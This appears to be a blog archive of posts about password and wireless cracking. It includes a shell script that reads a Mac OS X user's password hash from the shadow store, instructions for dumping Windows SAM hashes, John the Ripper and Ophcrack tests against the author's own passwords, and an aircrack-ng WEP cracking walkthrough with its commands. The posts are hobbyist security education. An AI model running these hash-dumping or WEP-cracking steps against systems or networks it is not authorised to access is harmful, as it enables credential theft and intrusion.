Posts tagged cracking
I think the passwords I use are pretty strong. They’re long, random, alphanumeric, and special characters. I know it’s possible to crack passwords, given enough time, so I thought I’d give it a try. I’m curious how long it’s going to take to crack. I’ll be trying to crack my Windows 7 password and my Mac OS X password using the infamous John the Ripper.
If you want to try this out yourself, you’ll want to use the latest revision (7 at this time) of the Jumbo patch. For the Windows download, you’ll also need to download cygz.dll (there’s a link below the Win32 download) and extract this dll to the /run directory of John the Ripper. For the Mac version, just download the Universal binary.
To extract password hashes from the SAM file on Windows 7, you’ll need PwDump7. It’s very likely that your virus protection (Avira AntiVir reports it as TR/Gendal.77824.CI) will report this as a virus/trojan of some type, you can safely ignore this and just ensure that you are indeed downloading it from the author’s website (the link above). You can also verify the downloaded exe hash provided in the ReadMe of PwDump7. You’ll need to run PwDump7.exe as an Administrator. I tried fgdump to dump the password hashes first but it wouldn’t ever output anything, even running as Administrator. If PwDump7 doesn’t work for you, try fgdump.
Mac OS X 10.6 Leopard implements a pretty standard shadowed password file put in a non-standard location, with a file per user instead of a global file like /etc/shadow. Use this script I wrote called pwdumposx to dump the password hash of the current user.
#!/bin/sh #pwdumposx - thexploit.com cmd="/usr/bin/xpath" path="/var/db/dslocal/nodes/Default/users/"$SUDO_USER".plist" args="//key1/following::array/string/text()" guid=$($cmd $path $args 2>/dev/null | cut -c1-36) cat '/var/db/shadow/hash/'$guid | cut -c169-216
Run like this
nobody@nobody:~$ chmod +x pwdumposx nobody@nobody:~$ sudo ./pwdumposx
Once you have the hash, you just put it in a new file as user:hash and feed the file as input into JtR. If you want status from JtR, press <Enter> and it will output current status. It might take a really long time.
Current Cracking Status for my Passwords
The Mac is a Core Duo with 8 gigs RAM
The Windows 7 is an i7 with 12 gigs RAM
- Mac OS X: 3h 26m elapsed, guesses 0
- Microsoft Windows 7: 2h 12m elapsed, guesses 0
- Mac OS X: 14h 31m elapsed, guesses 0
- Microsoft Windows 7: 13h 16m elapsed, guesses 0
Update 3 – FAILED
- Mac OS X: 1d 1h 31m elapsed, guesses 0
- Microsoft Windows 7: 1d 16m elapsed, guesses 0
Unfortunately it’s difficult for me to tie up my computers for more than a day so I’ve stopped both of them near the 1 day mark. The good news is that, as far as brute-forcing goes, my passwords would likely take sufficient time to crack. This just reiterates the fact that non-dictionary random passwords are a must. Maybe if I’m able to get some high powered server resources I’ll rerun this experiment for a week.
I did some simple tests tonight using the “free” rainbow tables that come with Ophcrack. I was expecting at least one of my passwords to be cracked but neither were. I think there were a couple reasons for this
- The password on my XP machine is 15 characters – Ophcrack only goes up to 14 with the free tables for XP
- The password on my Windows 7 machine is not in the dictionary – Ophcrack only uses a “based on dictionary” hybrid table with the free tables for Vista+
The good thing here is that for the “trivial” user, they won’t be able to get my passwords since the non-free tables go for $99 a piece or they’ll need to obtain other tables online.
So is it Ophcrack crap? No, probably not, that would be a little harsh since I bet the free tables would crack a huge majority of the general public’s passwords.
Almost everything, in some sense or another, is vulnerable to brute force. It’s just a matter of how long it takes for something to be brute forced that tends to it’s security. I found it pretty interesting that there are now online WPA crackers that will mount dictionary attacks against captured WPA authentication handshakes:
and even one that you pay for that claims to offer 400 CPU’s and a 135 million word dictionary list tailored to WPA passwords
Just goes to say that in due time, no matter how impossible it seems, dictionary attacks will likely be feasible in sooner time than one would think;all the more reason to use an entirely random WPA password.
Since I’ve been reading a lot about security in networking, I figured I’d give the well known WEP cracking a try.
Common Misconceptions With Wep Cracking
- You need a special card to crack WEP keys.
- This is not true, with some caveats. Any card that can be switched to “monitor mode” can be used to crack WEP keys. The vast majority of cards can do this or someone has written a custom driver (e.g. Airport Extreme Cards on Macs) to enable it. HOWEVER, and this is a big however; if you want to crack WEP without waiting for days or even weeks, you need a card to supports “packet injection.” This list is much smaller but growing as the hardcore driver writers write custom drivers for them.
- Nobody is going to crack my WEP key
- Not only is this entirely untrue, I personally promise you it will happen. There are now websites hooked into the Google Maps API which map out SSID’s and their encryption level, typically on major roads – http://wigle.net/
Intel 3945abg Wireless Card
This is the card that I have on my Dell Inspiron 640m and is a very popular card for laptops. Natively, this card does not support injection but around 2007 a package called ipwraw was developed by Tolas Feup and has since had 3 versions up to 2008 – http://www.aircrack-ng.org/doku.php?id=ipw3945. I use Backtrack and as of version 4.0 this card is fully supported with no custom configuration, simply load up Backtrack and start capturing and injecting!
With Backtrack loaded (ensure you’re in an graphical environment, if not type ‘startx’), do the following:
Turn on monitoring mode on the Intel card. You should then have a mon0 interface.
airmon-ng start wlan0
Now, search for your WEP Access Point (AP) by scanning SSIDs. This uses a technique called channel hoping to rapidly switch through all wireless channels to capture broadcasting packets:
Once you located your WEP AP, type ‘-c’ to terminate airodump-ng and copy the BSSID of your WEP AP and make note of the channel. We’re now going to turn it back on but have it only capture this specific BSSID. Leave this terminal open when you’re done.
airodump-ng --bssid BSSID -c CHANNEL -w OUTPUT_FILE mon0
Now we need to associate with the AP. Open a new terminal and type
aireplay-ng -1 0 -a BSSID mon0
If you received authentication successful from the previous command, you can move on. We’re now going to do an ARP replay attack against the AP so that we can get it to generate enough Initial Vectors (IV) (I plan to discuss the details of WEP weaknesses in a later post) that it will reuse one and from there we can obtain the WEP key
aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 mon0
This command may take a minute or so. What it’s doing is capturing packets and looking for an ARP packet. Sometimes it can take a while to find an ARP packet if there is little activity on the AP. Once it finds an ARP packet, you’ll see it repeatedly send ARP packets — this really is the key to the speed of the attack. Without this, we’d have to wait for quite some time to get enough IVs to do the crack.
Now you’ll need to monitor the airodump-ng terminal. Once the ARP packets are being replayed you should see the count in the Data column grow at a fast rate. You need to wait until this number is very large (depending on the key size of the AP). Try with 50k and then 100k and so on. Once you’ve captured enough data you can stop the aireplay-ng sending ARP requests and run the following (replace with OUTPUT_FILE from above):
If successful you’ll get a KEY FOUND! with the cracked WEP key. Enjoy, have fun, and don’t do anything illegal please!